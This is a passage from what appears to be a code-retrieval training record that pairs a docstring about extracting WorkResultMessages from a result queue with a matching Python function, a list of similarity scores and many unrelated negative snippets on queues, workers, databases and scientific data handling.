FITS cannot handle both of\n # those problems at once, so this fixes one of those\n # problems...\n # Shorten, sort of...\n short_name = _short_names[key]\n self.meta['HIERARCH {0}'.format(key.upper())] = (\n short_name, \"Shortened name for ccdproc command\")\n self.meta[short_name] = value\n else:\n self.meta[key] = value", "def add_dupemap(self, tag, dupesuf='_1',verbose=False):\n if (self.dupesuf != False and self.dupesuf != dupesuf): #suffix to add for duplicate rec_glm tags\n print 'Duplicate map already created with dupe_suf \"{0}\" - cannot change dupesuf to {1}'.format(self.dupesuf,dupesuf)\n else: self.dupesuf = dupesuf\n\n oldtag = tag\n if oldtag not in self.bintaglist:\n raise KeyError(\"Error! {0} not in taglist - don't know which map to duplicate.\")\n while tag in self.bintaglist:\n tag += self.dupesuf\n if verbose:print 'Duplicating {0}: naming new bintag \"{1}\"'.format(oldtag,tag)\n newNmap=self.Nmap+1\n newNcross=newNmap*(newNmap+1)/2\n oldmapind=self.tagdict[oldtag]\n newmapind= newNmap-1 #put new map at end\n new_nbar = self.nbar[oldmapind]\n newcl=np.zeros((newNcross,self.Nell))\n #delxinds=self.crossinds[oldmapind,:]\n ##newdocross=np.setdiff1d(self.docross,delxinds)#unique elements of docross not in delxinds\n \n #this isn't really necessary for adding a map since we're keeping all the old Cl, but keeping to minimize changes from original deletemap method\n\n#NOPE, BELOW IS WRONG, NOT ORDERED THAT WAY -- AUTOPOWERS ARE FIRST, PER THE \"NEW\" ORDERING IN HEALPY.SYNALM\n#http://healpy.readthedocs.io/en/latest/generated/healpy.sphtfunc.synalm.html\n#assuming the order goes as I think it does... first entries will all agree, then just duplicate last row, and again duplicate last element\n# so cl[newNmap,newNmap] == cl[newNmap-1,newNmap] == cl[newNmap-1, newNmap-1], and cl[newNmap,:] = cl[newNmap-1,:]\n\n newcrosspairs,newcrossinds = get_index_pairs(newNmap)\n newdox = []\n# print \"newNmap:\",newNmap\n for w in xrange(newNmap):\n for v in xrange(newNmap): \n if v<= w: #symmetric matrix\n xind_new = newcrossinds[w,v]\n if w < self.Nmap: #not looking at any pairs involving new map\n xind_old=self.crossinds[w,v]\n# tag1 = bintaglist[w]\n# tag2 = bintaglist[v]\n elif v<self.Nmap: # know w==self.Nmap. use the old xind from the original map for the new Cl[xind] of the duplicate map\n xind_old=self.crossinds[oldmapind,v]\n# print \"map1={0}, map2={1},xind_old={2},xind_new={3}\".format(w,v,xind_old,xind_new)\n else: #both v,w == self.Nmap\n xind_old=self.crossinds[oldmapind,oldmapind]\n# print \"Map1={0}, map2={1},xind_old={2},xind_new={3}\".format(w,v,xind_old,xind_new)\n newcl[xind_new, :] = self.cl[xind_old,:]\n newdox.append(xind_new) #new cross correlations we've calc'd\n# print xind_new\n #set up new values\n self.docross.extend(newdox) #indicate we've calculated the cross correlations\n self.Nmap=newNmap\n self.bintaglist.append(tag)\n self.tagdict={self.bintaglist[m]:m for m in xrange(self.Nmap)}\n self.Ncross=newNcross\n self.crosspairs=newcrosspairs #[crossind,mapinds] (NCross x2)\n self.crossinds=newcrossinds #[mapind,mapind] (Nmap x Nmap)\n #THIS IS A TEMPORARY HACK\n self.pairs=consolidate_dotags(['all'],self.bintaglist) #IS THIS STILL LEGITIMATE GIVEN THE \"HACK\" COMMENT ABOVE? 
[NJW 160627]\n #self.docross=['all'] \n #self.pairs=get_pairs_fromcrossind(self.bintaglist,newdocross,self.crosspairs,self.crossinds)\n self.cl=newcl\n self.nbar=np.append(self.nbar,new_nbar)\n #just set up noisecl again\n self.noisecl = np.zeros((self.Ncross,self.Nell)) \n for i in xrange(self.Nmap):\n if self.nbar[i]!=-1: #assumes -1 for no noise or isw\n diagind=self.crossinds[i,i]\n self.noisecl[diagind,:]=1/self.nbar[i]\n self.noisecl[diagind,0]=0\n return (self,tag) #return the new (now uniqe) tag", "def concatenate_record(record):\n new_record = {}\n for k,v in record.items():\n if k in ['AB','FX','PA','TI','RP','ID']:\n new_v = ' '.join(v)\n \n if k == 'ID':\n new_v = new_v.split('; ')\n \n new_record[k] = new_v\n elif k == 'CR':\n previous_citation = ''\n new_citations = []\n for citation in v:\n if previous_citation.endswith('DOI'):\n new_citations[-1] += ' ' + citation\n previous_citation = new_citations[-1]\n else :\n new_citations.append(citation)\n previous_citation = citation\n \n new_record[k] = new_citations\n else :\n new_record[k] = v\n \n return new_record", "def mel_gene_set(dict): # this uses the flanking genes, specifically\n\tmel_gene_set = set()\n\tfor k, v in dict.iteritems():\n\t\t#v[0] is up, v[1] is down\n\t\t#print \"this is v:\", v\n\t\tfor mg in v[0]:\n\t\t\tmel_gene_set.add(mg)\n\t\tfor mg in v[1]:\n\t\t\tmel_gene_set.add(mg)\n\treturn mel_gene_set", "def add_genre(self, gid: str, gen: str):\n if self.sess.query(exists().where(Genre.genre_id == gid or Genre.genre == gen)).scalar():\n return\n self.logging.info(f\"adding genre: {gen} with id {gid}\")\n genre = Genre(gid=uuid4().hex,\n genre_id=gid,\n genre=gen)\n self.sess.add(genre)\n self.sess.commit()", "def test_set_gene_from_info(self):\n \n # check for when a HGNC key exists\n self.var.info[\"HGNC\"] = \"A\"\n self.var.set_gene_from_info()\n self.assertEqual(self.var.gene, \"A\")\n \n # check for when a HGNC key doesn't exist\n del self.var.info[\"HGNC\"]\n self.var.set_gene_from_info()\n self.assertIsNone(self.var.gene)", "def _populate_oid_attid(self):\n self.hash_oid_name = {}\n res = self.search(expression=\"objectClass=attributeSchema\",\n controls=[\"search_options:1:2\"],\n attrs=[\"attributeID\",\n \"lDAPDisplayName\"])\n if len(res) > 0:\n for e in res:\n strDisplay = str(e.get(\"lDAPDisplayName\"))\n self.hash_oid_name[str(e.get(\"attributeID\"))] = strDisplay", "def add(self, key, value):\n self.data.append((key, value))" ]
[ "0.65119916", "0.5768898", "0.5745668", "0.5678076", "0.56137764", "0.5577298", "0.5574873", "0.5562769", "0.55310345", "0.54852855", "0.5448665", "0.5448038", "0.5416714", "0.54129606", "0.54046834", "0.539394", "0.5387726", "0.53722453", "0.5369394", "0.53620994", "0.5358258", "0.53442824", "0.5333245", "0.5328457", "0.53133875", "0.5296068", "0.5284008", "0.52584064", "0.5251175", "0.5251093", "0.52380687", "0.523567", "0.5233893", "0.5233436", "0.5209643", "0.52081347", "0.5193213", "0.5190308", "0.5184879", "0.51578313", "0.5153704", "0.5151389", "0.5112146", "0.5111857", "0.5097014", "0.50854635", "0.5084874", "0.50845903", "0.5082367", "0.5082367", "0.506765", "0.5063917", "0.5063795", "0.505174", "0.50516933", "0.5051672", "0.5050723", "0.50505346", "0.504835", "0.5044839", "0.50383246", "0.50382197", "0.5029612", "0.5027254", "0.50264555", "0.501327", "0.5012686", "0.5002887", "0.4996906", "0.49917302", "0.49884984", "0.4983959", "0.49817273", "0.4981304", "0.49790376", "0.49767467", "0.49766758", "0.49706098", "0.49697435", "0.49659857", "0.49638325", "0.4960188", "0.49555328", "0.4950401", "0.49479842", "0.4946049", "0.49400857", "0.49297115", "0.49290708", "0.4923409", "0.49217814", "0.4918983", "0.49173176", "0.49166578", "0.49165955", "0.4913672", "0.49134877", "0.49104235", "0.49097788", "0.4893453" ]
0.7082176
0
for handling WorkResultMessages from Result queue
def extractWorkResultMessage(messageBody):
    messageContents = json.loads(messageBody)
    try:
        message = WorkResultMessage(body=messageContents)
        return message
    except:
        log.error(str(sys.exc_info()[0]))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_results_from_message_queue():\n message_queue.get_result_length()\n logger.info(\"get task results from task queue\")", "def process_messages(self):\n pass", "def _process_worker(call_queue, result_queue):\n while True:\n call_item = call_queue.get(block=True)\n if call_item is None:\n # Wake up queue management thread\n result_queue.put(os.getpid())\n return\n try:\n r = call_item.fn(*call_item.args, **call_item.kwargs)\n except BaseException as e:\n exc = _ExceptionWithTraceback(e, e.__traceback__)\n result_queue.put(_ResultItem(call_item.work_id, exception=exc))\n logger.exception(e) # 主要是直接显示错误。\n else:\n result_queue.put(_ResultItem(call_item.work_id,\n result=r))", "def result(self):\n return Result(self.messages[:])", "def put_internal_result(self, job_result):\n self.internal_result_queue.append(job_result)", "def _do(self):\n # Get all the messages in queue\n msgs = self.RPC.query.all()\n for msg in msgs:\n # Find the first msg marked as enqueued.\n\n if msg.working and \\\n (self.current_time_seconds() - self.millisec_to_sec(msg.updated)) \\\n > self.conf.messaging_server.response_timeout:\n msg.status = message.Message.ENQUEUED\n msg.update(condition=self.working_status_condition)\n\n if not msg.enqueued:\n continue\n if 'plan_name' in list(msg.ctxt.keys()): # Python 3 Conversion -- dict object to list object\n LOG.info('Plan name: {}'.format(msg.ctxt['plan_name']))\n elif 'plan_name' in list(msg.args.keys()): # Python 3 Conversion -- dict object to list object\n LOG.info('Plan name: {}'.format(msg.args['plan_name']))\n\n # Change the status to WORKING (operation with a lock)\n msg.status = message.Message.WORKING\n msg.owner = socket.gethostname()\n # All update should have a condition (status == enqueued)\n _is_updated = msg.update(condition=self.enqueued_status_condition)\n\n if not _is_updated or 'FAILURE' in _is_updated:\n continue\n\n # RPC methods must not start/end with an underscore.\n if msg.method.startswith('_') or msg.method.endswith('_'):\n error_msg = _LE(\"Method {} must not start or end\"\n \"with underscores\").format(msg.method)\n self._log_error_and_update_msg(msg, error_msg)\n return\n\n # The first endpoint that supports the method wins.\n method = None\n for endpoint in self.endpoints:\n if msg.method not in dir(endpoint):\n continue\n endpoint_method = getattr(endpoint, msg.method)\n if callable(endpoint_method):\n method = endpoint_method\n if self.conf.messaging_server.debug:\n LOG.debug(\"Message {} method {} is \"\n \"handled by endpoint {}\".\n format(msg.id, msg.method,\n method.__str__.__name__))\n break\n if not method:\n error_msg = _LE(\"Message {} method {} unsupported \"\n \"in endpoints.\").format(msg.id, msg.method)\n self._log_error_and_update_msg(msg, error_msg)\n return\n\n # All methods must take a ctxt and args param.\n if inspect.getfullargspec(method).args != ['self', 'ctx', 'arg']:\n error_msg = _LE(\"Method {} must take three args: \"\n \"self, ctx, arg\").format(msg.method)\n self._log_error_and_update_msg(msg, error_msg)\n return\n\n LOG.info(_LI(\"Message {} method {} received\").format(\n msg.id, msg.method))\n if self.conf.messaging_server.debug:\n LOG.debug(\n _LI(\"Message {} method {} context: {}, args: {}\").format(\n msg.id, msg.method, msg.ctxt, msg.args))\n\n failure = None\n try:\n\n # Add the template to conductor.plan table\n # Methods return an opaque dictionary\n result = method(msg.ctxt, msg.args)\n\n # FIXME(jdandrea): Remove response/error and make it opaque.\n # That means this would just be assigned 
result outright.\n msg.response = result.get('response', result)\n except Exception:\n # Current sys.exc_info() content can be overridden\n # by another exception raised by a log handler during\n # LOG.exception(). So keep a copy and delete it later.\n failure = sys.exc_info()\n\n # Do not log details about the failure here. It will\n # be returned later upstream.\n LOG.exception(_LE('Exception during message handling'))\n\n try:\n if failure is None:\n msg.status = message.Message.COMPLETED\n else:\n msg.failure = \\\n rpc_common.serialize_remote_exception(failure)\n msg.status = message.Message.ERROR\n LOG.info(_LI(\"Message {} method {}, status: {}\").format(\n msg.id, msg.method, msg.status))\n if self.conf.messaging_server.debug:\n LOG.debug(\"Message {} method {}, response: {}\".format(\n msg.id, msg.method, msg.response))\n\n _is_success = 'FAILURE'\n while 'FAILURE' in _is_success and (self.current_time_seconds() - self.millisec_to_sec(msg.updated)) \\\n <= self.conf.messaging_server.response_timeout:\n _is_success = msg.update()\n LOG.info(_LI(\"updating the message status from working to {}, \"\n \"atomic update response from MUSIC {}\").format(msg.status, _is_success))\n\n except Exception:\n LOG.exception(_LE(\"Can not send reply for message {} \"\n \"method {}\").\n format(msg.id, msg.method))\n finally:\n # Remove circular object reference between the current\n # stack frame and the traceback in exc_info.\n del failure", "def _add_result(self, msg, identity=None):\n receipt = None\n try:\n if isinstance(msg, mplane.model.Envelope):\n # if the result is an envelope containing multijob\n # results, keep the receipt until the multijob ends\n (start, end) = msg.when().datetimes()\n if end < datetime.utcnow():\n if self._supervisor:\n self._exporter.put_nowait([msg, identity])\n\n receipt = self._receipts[msg.get_token()]\n self._remove_receipt(receipt)\n else:\n receipt = self._receipts[msg.get_token()]\n self._remove_receipt(receipt)\n except KeyError:\n pass\n self._results[msg.get_token()] = msg\n\n if not isinstance(msg, mplane.model.Exception):\n if msg.get_label():\n self._result_labels[msg.get_label()] = msg\n else:\n # Exceptions are only added to result_labels if a receipt existed in receipts -WHY\n if receipt is not None:\n self._result_labels[receipt.get_label()] = msg", "def application_message(self, bus, msg):\n msgtype = msg.structure.get_name()\n if msgtype == 'partial_result':\n self.partial_result(msg.structure['hyp'], msg.structure['uttid'])\n if msgtype == 'result':\n self.final_result(msg.structure['hyp'], msg.structure['uttid'])", "def application_message(self, bus, msg):\n msgtype = msg.structure.get_name()\n if msgtype == 'partial_result':\n self.partial_result(msg.structure['hyp'], msg.structure['uttid'])\n if msgtype == 'result':\n self.final_result(msg.structure['hyp'], msg.structure['uttid'])", "def _wait_for_results(self) -> RemoteCallableResult:\n if (\n self.subscriber is None or\n self.started is None or\n self.process is None\n ):\n raise dbt.exceptions.InternalException(\n '_wait_for_results() called before handle()'\n )\n\n try:\n msg = self.subscriber.dispatch_until_exit(\n started=self.started,\n timeout=self.timeout,\n )\n except dbt.exceptions.Exception as exc:\n raise dbt_error(exc)\n except Exception as exc:\n raise server_error(exc)\n if isinstance(msg, QueueErrorMessage):\n raise RPCException.from_error(msg.error)\n elif isinstance(msg, QueueTimeoutMessage):\n if not self._single_threaded:\n self.process.terminate()\n raise 
timeout_error(self.timeout)\n elif isinstance(msg, QueueResultMessage):\n return msg.result\n else:\n raise dbt.exceptions.InternalException(\n 'Invalid message type {} (result={})'.format(msg)\n )", "def application_message(self, bus, msg):\n\t\tmsgtype = msg.structure.get_name()\n\t\tif msgtype == 'partial_result':\n\t\t\tself.partial_result(msg.structure['hyp'], msg.structure['uttid'])\n\t\telif msgtype == 'result':\n\t\t\tself.final_result(msg.structure['hyp'], msg.structure['uttid'])", "def received_job_from_worker(self, arguments, result, worker_name):\n # Find the correct job.\n job = [_i for _i in self._workers[worker_name].active_jobs\n if _i.arguments == arguments]\n if len(job) == 0:\n msg = (\"MASTER: Job %s from worker %i not found. All jobs: %s\\n\" %\n (str(arguments), worker_name,\n str(self._workers[worker_name].active_jobs)))\n raise ValueError(msg)\n if len(job) > 1:\n raise ValueError(\"WTF %i %s %s\" % (\n worker_name, str(arguments),\n str(self._workers[worker_name].active_jobs)))\n job = job[0]\n job.result = result\n\n self._workers[worker_name].active_jobs.remove(job)\n self._workers[worker_name].completed_jobs_count[0] += 1\n self._finished_jobs.append(job)", "def _process_json_rpc_message(self, msg, msg_id):\n future = self._pending_requests.get(msg_id, None)\n if future:\n error = msg.get('error', None)\n result = msg.get('result', None)\n if error:\n future.set_result(error)\n else:\n future.set_result(result)\n else:\n self._logger.error(\n \"Message received without a matching pending request! '{}'\".format(msg))", "def put_external_result(self, job_result):\n self.result_queue.append(job_result)", "def process_queue_item(self, job_details):\n raise NotImplementedError(\"Workers must implement run.\")", "def on_get_result(self):\n if not self.queue.empty():\n self.update_status(self.queue.get(0))\n if self.worker_process.is_alive():\n self.master.after(self.query_delay, self.on_get_result)\n return\n else:\n self.exec_btn.config(state=Tkinter.NORMAL)", "def application_message(self, bus, msg):\n\t\tmsgtype = msg.structure.get_name()\n\t\tif msgtype == 'partial_result':\n\t\t\tself.partial_result(msg.structure['hyp'], msg.structure['uttid'])\n\t\telif msgtype == 'result':\n\t\t\tself.final_result(msg.structure['hyp'], msg.structure['uttid'])\n\t\t\tself.pipeline.set_state(gst.STATE_PAUSED)", "def _r_process_message(self, result, protocol):\n if isinstance(result.original_message, SubscribeMessage):\n self._r_subscribe_to_event(result.original_message.service_name,\n result.original_message.event_name,\n protocol)\n \n return result.response", "def work(self, job):\n pass", "def _on_result(self, result_type, result_data):\n self._log.info(\"Sending result\")\n self._host_comms.send_msg(\"result\", {\"type\": result_type, \"data\": result_data})", "def handle_result(self, results: List[Dict], **info):\n pass", "def _process_incoming_queue_messages(self):\n while self._queue.qsize():\n msg = self._queue.get()\n if msg == MAP_UPDATE:\n self._clear_measurement_progress_label()\n self._presenter.update_map(self.chosen_value.get())", "def _dispatch_messages(self):\n while True:\n select_obj = (yield)\n if select_obj == self._message_queue.selobj:\n msg = self._message_queue.get_nowait()\n if msg is not None:\n msg_type = msg.get('type', None)\n if msg_type is not None:\n msg_handler = self._message_handlers.get(msg_type, None)\n if msg_handler is not None:\n msg_handler(msg['data'])", "def collect(self):\n while True:\n if not self._queue.empty():\n message = 
self._queue.get()\n self.working_on = message['job_type']\n else:\n break\n logging.info(\"Popped off message: {}\\n\".format(str(message)))\n\n if message['job_type'] == 'STOP':\n break\n\n if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':\n raise ValueError('{} is not a recognized task type'.format(message['job_type']))\n pass\n\n \"\"\" Query all repos with repo url of given task \"\"\"\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'\n \"\"\".format(message['given']['git_url']))\n repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])\n\n try:\n if message['models'][0] == 'badges':\n self.badges_model(message, repo_id)\n except Exception as e:\n register_task_failure(self, logging, message, repo_id, e)\n pass", "def _process_message(self, obj):\n pass", "def collect(self):\n while True:\n if not self._queue.empty():\n message = self._queue.get()\n self.working_on = message['job_type']\n else:\n break\n logging.info(\"Popped off message: {}\\n\".format(str(message)))\n\n if message['job_type'] == 'STOP':\n break\n\n if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':\n raise ValueError('{} is not a recognized task type'.format(message['job_type']))\n pass\n\n # Query all repos with repo url of given task\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'\n \"\"\".format(message['given']['github_url']))\n repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])\n\n try:\n if message['models'][0] == 'pull_requests':\n self.pull_requests_model(message, repo_id)\n elif message['models'][0] == 'pull_request_commits':\n self.pull_request_commits_model(message, repo_id)\n elif message['models'][0] == 'pull_request_files':\n self.pull_requests_graphql(message, repo_id)\n except Exception as e:\n register_task_failure(self, message, repo_id, e)\n pass", "def processMessage(self, *args, **kwargs):\r\n pass", "def _handle_result(self, result):\n if self.result_callback != None:\n #Call the result callback but expect failure.\n try:\n self.result_callback(result, self.rpcclient)\n except Exception as ex:\n self.log.failure(\"Error in result handler for '{cmd!r}'.\",cmd=self.command)\n else:\n #If no handler is set, all we do is log.\n self.logg.error(\"Error: no on_result defined for '{cmd!r}' command result: {res!r}.\",cmd=self.command,res=result)", "def _process_data(f, work_queue, results_queue):\n for element in iter(work_queue.get, FINISHED):\n try:\n results_queue.put(f(element))\n except Exception, work_error:\n LOG.critical('parallel_pc Error: {0}\\n\\n\\tconfig settings {1}\\n'.format(work_error, element))\n results_queue.put(FINISHED)", "def process_result(self, result: Any) -> None:\n raise NotImplementedError()", "def on_result(self, result):\n # we create a self.results list to store the results as they come back from the process() method\n self.results.append(result)", "def process(self, msg):\n raise NotImplemented", "def test_process_message_queue(self):\n t = threading.Thread(target=self.handle_message_queue)\n t.start()\n\n self.dut._process_message_queue()\n\n t.join()", "def service_queue(queue, result_id, dut, dut_id):\n mdb = get_autotest()\n ldb = get_logging()\n count = 0\n while 1:\n mesg =queue.get()\n if mesg == 'finish':\n print >>sys.stderr, '[logged %d lines to %s for %s]' % (\n count, result_id, dut)\n break\n (ts, kind, message) = mesg\n count += 1\n if type(message) ==type(''):\n 
message = unicode(message, encoding='utf8')\n if type(kind) == type(''):\n kind = unicode(kind, encoding = 'utf8')\n handle = '%s_%d_%f_%s' % (dut if dut else dut_id, count, ts, HOSTNAME)\n \n terms = {'message':message, 'kind': kind, 'time': ts, '_id': handle}\n if dut_id:\n terms['dut_id'] = dut_id\n if dut:\n terms['dut_name'] = dut\n if result_id:\n terms['result_id'] = result_id\n if kind in ['HEADLINE', 'RESULT'] and result_id and dut:\n rdoc = mdb.results.find_one({'_id':result_id})\n if rdoc:\n build = rdoc.get('build')\n if build:\n set_build_information(build, \n {'test_status': [ts, dut, message]})\n else:\n print 'no build for headline'\n else:\n print 'no result for headline'\n ldb.logs.save(terms)", "def _r_handle_message_contents(self, msg, protocol):\n if isinstance(msg, ResponseMessage):\n d = self._waiting_messages.pop(msg.response_to, None)\n if d is not None:\n d.callback(msg)\n elif isinstance(msg, ServerMotdMessage):\n print(\"Connected: %s\" % msg.motd)\n self._r_successful_connection()\n elif isinstance(msg, EventMessage):\n callback = self._event_callbacks.get((msg.service_name, msg.event_name))\n if callback is not None:\n threads.deferToThread(callback, *msg.pargs, **msg.kwargs)", "def _work_function(job_q, result_q, error_q):\r\n # type: (Queue, Queue, Queue) -> None\r\n while True:\r\n job = job_q.get()\r\n\r\n if isinstance(job, _ThreadPoolSentinel):\r\n # All the work is done, get out\r\n result_q.put(_ThreadPoolSentinel())\r\n error_q.put(_ThreadPoolSentinel())\r\n job_q.task_done()\r\n break\r\n\r\n function = job[0]\r\n args = job[1]\r\n try:\r\n result = function(*args)\r\n except Exception as e:\r\n error_q.put((job, e))\r\n else:\r\n result_q.put((job, result))\r\n finally:\r\n job_q.task_done()", "def process(self, results):\n raise NotImplementedError", "def _handle_execute_result(self, msg):\n self.log.debug(\"execute_result: %s\", msg.get('content', ''))\n if self.include_output(msg):\n self.flush_clearoutput()\n content = msg['content']\n prompt_number = content.get('execution_count', 0)\n data = content['data']\n metadata = msg['content']['metadata']\n if 'image/svg+xml' in data:\n self._pre_image_append(msg, prompt_number)\n self._append_svg(data['image/svg+xml'], True)\n self._append_html(self.output_sep2, True)\n elif 'image/png' in data:\n self._pre_image_append(msg, prompt_number)\n png = b64decode(data['image/png'].encode('ascii'))\n self._append_png(png, True, metadata=metadata.get('image/png',\n None))\n self._append_html(self.output_sep2, True)\n elif 'image/jpeg' in data and self._jpg_supported:\n self._pre_image_append(msg, prompt_number)\n jpg = b64decode(data['image/jpeg'].encode('ascii'))\n self._append_jpg(jpg, True, metadata=metadata.get('image/jpeg',\n None))\n self._append_html(self.output_sep2, True)\n elif 'text/latex' in data:\n self._pre_image_append(msg, prompt_number)\n try:\n self._append_latex(data['text/latex'], True)\n except LatexError:\n return super(RichJupyterWidget, self)._handle_display_data(msg)\n self._append_html(self.output_sep2, True)\n else:\n # Default back to the plain text representation.\n return super(RichJupyterWidget, self)._handle_execute_result(msg)", "def _worker(\n self, work_queue: Queue, done_queue: Queue, build_results: bool = True\n ):\n for chunk in iter(work_queue.get, \"STOP\"):\n interactions = self._play_matches(chunk, build_results)\n done_queue.put(interactions)\n done_queue.put(\"STOP\")\n return True", "def store(self, job, result):\n pass", "def handleMessage(msg):", "def 
get_external_result(self):\n while True:\n if len(self.result_queue) > 0:\n result = copy.deepcopy(self.result_queue[0])\n del self.result_queue[0]\n return result", "def handle_message(self, message):", "def _add_message(self, message):\r\n self.result = self.result + message", "def send_msg(self, my_queue, my_msg):", "def manageResults(self, name=None):\n job, name = self.getJob(name)\n if job.error() != None:\n print 'job had an error, use view details'\n elif job.state() == 'Finished':\n self.showPEATSAResultsDialog(job, name)\n else:\n print 'Job is not finished yet.'\n return", "async def process(self, message):\n return await self.dispatcher.dispatch(message)", "def __call__(self, graph):\n result = graph.sqs_message_dispatcher.handle_batch()\n if not result.message_count:\n raise SleepNow()", "def process_message(self, message_body, message_id, queue):\n\n # Unpack the message.\n try:\n message_body = pickle.loads(message_body)\n identifier = message_body['identifier']\n remove = message_body.get('remove')\n except Exception, error:\n # There was a major problem with this message. Accept the message\n # since it's not likely to be a service availability problem.\n logging.error('Invalid message: %s' % error)\n queue.ack(message_id)\n return\n\n def update_search_index():\n update_object(identifier, remove=remove, exception_handling=False)\n\n try:\n\n retry = False\n\n try:\n update_search_index()\n except self.RetryExceptions as error:\n retry = True\n logging.warning('Problem while processing %r: %s' % (identifier, error))\n self.on_error(error)\n time.sleep(1)\n update_search_index()\n\n queue.ack(message_id)\n\n except Exception as error:\n\n if retry:\n\n # There was still an error after retrying. This is likely to be\n # a service availability issue, so log a critical error message\n # and DON'T accept the message. 
It will try again next time\n # this script runs / the daemon is restarted.\n logging.critical('Could not process %r: %s' % (identifier, error))\n logging.error('Not accepting message for %r' % identifier)\n\n else:\n\n # All hell has broken loose and it's probably a code problem.\n # It's probably not a service availability issue, so only log\n # an error level message, and accept the message so it doesn't\n # clog up the queue.\n logging.error('Unhandled error while processing %r: %s' % (identifier, error))\n queue.ack(message_id)", "def process_messages(self, messages):\n\n return messages", "def do_work(self):", "def workerFinished(self, ret):\n self.worker.deleteLater()\n self.thread.quit()\n self.thread.wait()\n self.thread.deleteLater()\n # remove widget from message bar\n self.iface.messageBar().popWidget(self.messageBar)\n if ret is not None:\n # report the result\n #layer, total_area = ret\n self.iface.messageBar().pushMessage('Finished!')\n else:\n # notify the user that something went wrong\n self.iface.messageBar().pushMessage('Job cancelled.', level=QgsMessageBar.WARNING, duration=3)", "def queueStatusAll():", "def test_result_queue_basic(start_result_q_publisher):\n result_pub = start_result_q_publisher()\n publish_messages(result_pub, 10)\n try_assert(lambda: result_pub._mq_chan is not None, \"Required for cleanup\")\n result_pub._mq_chan.queue_purge(\"results\")\n result_pub.stop()", "def OnResult1(self, event):\r\n \r\n if event.data is None:\r\n # Thread aborted (using our convention of None return)\r\n print('GPIB data aborted'), time.strftime(\"%a, %d %b %Y %H:%M:%S\", Time)\r\n else:\r\n # Process results here\r\n print'GPIB Result: %s' % event.data,time.strftime(\"%a, %d %b %Y %H:%M:%S\", Time)\r\n \r\n \r\n # In either event, the worker is done\r\n self.worker1 = None", "def process_message(self, msg, src):", "def handle_result(self,result,event):\r\n # If the result is a number, according to the design we\r\n if isinstance(result,(int,float)):\r\n event.time=self.time+result\r\n # Hint: The reason which this event is added back to the queue is because the function executed is a generator.\r\n # That is to say, that function used a \"yield\" command. In the first round of execution, it yields the delay\r\n # time. Then, the event is added back to the queue to be executed the second time. In the second round, the\r\n # execution starts from where it left off in the first round. If you are not familiar with the concept of\r\n # generator, this is confusing. I was confused for a while. 
I recommend you figure out what a generator is\r\n # first.)-->\r\n self.add_event(event)\r\n # If the result is a dictionary,\r\n elif isinstance(result,dict):\r\n event.time=self.time+result.get('delay',0)\r\n event.priority=result.get('priority',event.priority)\r\n # If you are confused about why this event is added back to the queue, please refer to the above hint.\r\n self.add_event(event)\r\n elif isinstance(result,(str,Trigger)):\r\n event.time=None\r\n if result not in self.triggers:\r\n # Here we add function executions to the self.triggers dictionary.\r\n self.triggers[result]=[event]\r\n else:\r\n self.triggers[result].append(event)\r\n elif isinstance(result,(list,tuple)):\r\n events=[copy.copy(event) for r in result]\r\n for e in events: e.group=events\r\n for i,r in enumerate(result):\r\n self.handle_result(r,events[i])\r\n elif result is None:\r\n if event.parent is not None:\r\n event.parent.time=self.time\r\n self.add_event(event.parent)\r\n elif isinstance(result,Event):\r\n if result.generator and event.generator:\r\n result.parent=event\r\n elif hasattr(result,'default_trigger'):\r\n self.handle_result(result.default_trigger,event)\r\n else:\r\n raise SchedulerError(\"Incorrect 'yield': %s\"%(result))", "def success_message_addon(self, queue, result):\n updated_issues_count, delay = result\n return ' [updated=%d]' % updated_issues_count", "def _messages(self):\n q = [json.loads(i)['message'] for i in self.client.kv.get(\n 'rhumba.q.testqueue', [])]\n return q", "def check_plugin(work_queue, result_queue):\n while work_queue.qsize():\n host = work_queue.get()\n result = commands.getoutput(plugin_cmd + \" -H \" + host)\n result_queue.put([host, result])", "def get_internal_result(self):\n if len(self.internal_result_queue) > 0:\n result = copy.deepcopy(self.internal_result_queue[0])\n del self.internal_result_queue[0]\n return result", "def handle(self, message):", "def _process_redis_message(self, msg, msg_id):\n msg_result = msg['result']\n processed = False\n if msg_id == 'redis-pubsub-init':\n processed = True # Nothing to do really.\n if not processed:\n if self._on_update:\n self._io_loop.add_callback(self._on_update, msg_result)\n else:\n self._logger.warn('Ignoring message (no on_update_callback): %s',\n msg_result)", "def _process_batch(self, subqueue):\n try:\n timeoutCall = None\n jo = None\n if self.max_batch_size == 1:\n #At time of writing, the regular nodes have broken JSON-RPC batch handling.\n #So when max_batch_size is set to one, we assume we need to work around this fact.\n jo = json.dumps(self.entries[subqueue[0]]._get_rpc_call_object())\n else:\n #The api.steemitstage.com node properly supports JSON-RPC batches, and so, hopefully soon, will the other nodes.\n qarr = list()\n for num in subqueue:\n qarr.append(self.entries[num]._get_rpc_call_object())\n jo = json.dumps(qarr)\n url = \"https://\" + self.nodes[self.node_index] + \"/\"\n url = str.encode(url)\n deferred = self.agent.request('POST',\n url,\n Headers({\"User-Agent\" : ['Async Steem for Python v0.6.1'],\n \"Content-Type\": [\"application/json\"]}),\n _StringProducer(jo))\n def process_one_result(reply):\n \"\"\"Process a single response from an JSON-RPC command.\"\"\"\n try:\n if \"id\" in reply:\n reply_id = reply[\"id\"]\n if reply_id in self.entries:\n match = self.entries[reply_id]\n if \"result\" in reply:\n #Call the proper result handler for the request that this response belongs to.\n match._handle_result(reply[\"result\"])\n else:\n if \"error\" in reply and \"code\" in 
